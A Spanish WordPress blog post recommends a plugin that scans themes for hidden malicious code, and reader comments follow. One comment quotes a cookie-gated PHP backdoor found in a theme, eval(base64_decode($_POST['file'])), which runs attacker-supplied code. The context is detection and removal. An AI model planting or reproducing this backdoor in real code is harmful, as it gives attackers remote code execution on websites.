Hoy en día no es imposible hackear un theme WordPress, si no cumples unas mínimas reglas de seguridad alguien podría insertar código en tu theme, pero no solo así, es mucho mas fácil. Porque llevado por las búsquedas puedes llegar a descargar un theme de un sitio dudoso, en vez del sitio oficial, y activarlo en tu blog sin saber que lleva incluido código malicioso.
Si tienes dudas, o quieres asegurarte, puedes comprobarlo con el plugin Theme Authenticity Checker (o TAC). Lo que hace es buscar en los archivos de tu theme instalado y tratar de detectar código malicioso. Si encuentra código de este tipo muestra la ruta al fichero del theme, el número de línea donde está y una pequeña muestra del código sospechoso.
Ahora bien ¿es seguro que ese código sea código malicioso?. Hay posibilidades de que no sea así. No es que sean muchos pero si hay algunos creadores de themes que incluyen códigos ocultos en Base64 o similares para, por ejemplo, impedir que retires los créditos al autor o sus patricinadores.
Entonces ¿como sé si el código es malware o no?. Lo mas fácil es contactar con el autor para comprobarlo, o si quieres descargar la versión “oficial” y comparar las posibles diferencias.
En cualquier caso, Theme Authenticity Checker te da pistas acerca de códigos que no deberían estar ahí, que no son normales en un theme para WordPress.
7 comentarios en “¿Han hackeado tu Theme?”
Información Bitacoras.com…
Si lo deseas, puedes hacer click para valorar este post en Bitacoras.com. Gracias….
Exelente Fernando, así nos podemos asegurar de que estamos usando un theme bueno, por así decirlo, sin ningún tipo de modificaciones raras.
Muchas gracias por el plugin.
Nos vemos
Me fascino esta herramienta… Por que desde ella tambien modifico los creditos y unos cuantos enlaces publicitarios… Gracias por haber posteado este plugin tan excelente…. Chao Ayudawordpress.com
Pues en mi teme había un código muy sospechoso:
if($_COOKIE['daccaf48560b651c']==”931f9058bd933379″){ eval(base64_decode($_POST['file'])); exit; }
Que sería algo como si la cookie es igual 931f9058bd933379 puedes recibir por post la variable file, lo descodificas de la base 64 y lo ejecutas.
Ya lo he borrado porque creo que con esto puedes enviar un fichero y ejecutar las ordenes en php….
Ya investigaré si ese código estaba ahí desde un principio.
Excelente plugin!.
Siempre que veo que algún theme contiene código ofuscado en el footer.php, lo que siempre hago es cambiar de theme o pedir ayuda para que me lo ofusquen.
Saludos!
Excelente recomendación. Hace algunos días tuve un problema de estos (por estar usando una versión vieja de Wordpress) y realmente fue un problema ya que Google consideró mi sitio como presunto de ataques.
[...] | Theme Authenticity Checker Vía | Ayuda WordPress noticias de blogs [...]
Escribe un Comentario
Si quieres aprender como hacer multitud de diseños distintos para WordPress no te pierdas esta estupenda recopilación de 26 tutoriales de diseño de blogs WordPress.
[#3]
Acaba de salir a la luz la nueva versión de WordPress para iPhone 1.3, con soporte completo para el firmware de iPhone 3.0. Va
de cojonesestupendamente. Altamente recomendable esta actualización, que tienes en iTunes.[#1]
Me avisa Kike Alonso de un nuevo plugin que permite que los comentarios que dejen tus amigos de Friendfeed al respecto de un post de tu sitio WordPress aparezcan también en tu post como comentarios normales, algo realmente interesante pues permite, con algunos clientes de escritorio e iPhone, comentar en blogs sin dejar de usar la aplicación de mensajería.
[#6]
Último mensaje de: Fernando
En el foro: Plugins
Último mensaje de: Fernando
En el foro: Themes y Diseño
Último mensaje de: Fernando
En el foro: Dominios - Hosting
Último mensaje de: ginnomillan
En el foro: Plugins
Último mensaje de: corcelespi
En el foro: General WordPress.org
Acceder